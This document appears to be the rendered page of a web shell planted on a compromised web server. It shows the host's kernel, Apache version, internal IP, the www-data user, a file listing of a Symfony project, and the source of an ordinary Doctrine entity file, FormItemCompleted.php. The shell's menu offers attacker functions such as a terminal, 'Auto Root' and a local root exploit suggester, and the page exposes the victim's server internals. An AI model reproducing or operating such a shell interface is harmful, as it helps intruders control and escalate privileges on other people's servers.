Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContentBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
Files.php
6.69
KB
-rwxrwxr-x
2026-04-02 11:48
Form.php
10.37
KB
-rwxrwxr-x
2026-04-02 11:48
FormCompleted.php
5.6
KB
-rwxrwxr-x
2026-04-02 11:48
FormItem.php
17.12
KB
-rwxrwxr-x
2026-04-02 11:48
FormItemCompleted.php
3.81
KB
-rwxrwxr-x
2026-04-02 11:48
FormItemForm.php
1.57
KB
-rwxrwxr-x
2026-05-25 12:28
FormItemList.php
1.62
KB
-rwxrwxr-x
2026-05-25 12:28
FormItemType.php
1.54
KB
-rwxrwxr-x
2026-05-25 12:28
FormType.php
843
B
-rwxrwxr-x
2026-05-25 12:28
Save
Rename
<?php namespace App\ContentBundle\Entity; use Doctrine\DBAL\Types\Types; use Doctrine\ORM\Mapping as ORM; /** * FormItemCompleted * * @ORM\Table(name="content_form_item_completed") * @ORM\Entity(repositoryClass="App\ContentBundle\Repository\FormItemCompletedRepository") * @ORM\HasLifecycleCallbacks */ class FormItemCompleted { /** * @ORM\Id * @ORM\Column(type="string", unique=true) * @ORM\GeneratedValue(strategy="CUSTOM") * @ORM\CustomIdGenerator(class="Ramsey\Uuid\Doctrine\UuidGenerator") */ private $id; /** * @ORM\Column(type="blob", nullable=true) */ private $value; /** * @ORM\Column(type="text", nullable=true) */ private $additional_comments; /** * @var string|null */ private $value_string; /** * @ORM\Column(type="datetime") */ private $created_at; /** * @ORM\Column(type="datetime", nullable=true) */ private $updated_at; /** * @ORM\ManyToOne(targetEntity="FormItem", inversedBy="form_item_completed") * @ORM\JoinColumn(name="form_item_id", referencedColumnName="id") */ private $form_item; /** * @ORM\ManyToOne(targetEntity="FormCompleted", inversedBy="form_item_completed") * @ORM\JoinColumn(name="form_completed_id", referencedColumnName="id") */ private $form_completed; public function getId(): ?string { return $this->id; } public function getValue() { if (strlen($this->value_string) > 0) { return $this->value_string; } if (!is_resource($this->value)) { $this->value_string = $this->value; } else { $this->value_string = ''; while (!feof($this->value)) { $this->value_string .= fread($this->value, 8192); } // echo $str . '<br />'; } return $this->value_string; } public function setValue($value): static { $this->value = $value; return $this; } public function getAdditionalComments() { return $this->additional_comments; } public function setAdditionalComments($additional_comments): static { $this->additional_comments = $additional_comments; return $this; } public function getFormItem(): ?FormItem { return $this->form_item; } public function setFormItem(?FormItem $form_item): static { $this->form_item = $form_item; return $this; } public function getFormCompleted(): ?FormCompleted { return $this->form_completed; } public function setFormCompleted(?FormCompleted $form_completed): static { $this->form_completed = $form_completed; return $this; } public function getCreatedAt(): ?\DateTimeInterface { return $this->created_at; } public function setCreatedAt(\DateTimeInterface $created_at): static { $this->created_at = $created_at; return $this; } public function getUpdatedAt(): ?\DateTimeInterface { return $this->updated_at; } public function setUpdatedAt(?\DateTimeInterface $updated_at): static { $this->updated_at = $updated_at; return $this; } /** * @ORM\PrePersist */ public function setCreatedAtValue() { if (is_null($this->getCreatedAt())) { $this->setCreatedAt(new \DateTime()); } if (is_null($this->getUpdatedAt())) { $this->setUpdatedAt(new \DateTime()); } } /** * @ORM\PreUpdate */ public function setUpdatedAtValue() { $this->setUpdatedAt(new \DateTime()); } public function __toString(): string { return $this->form_item . ': ' . $this->getValue(); } }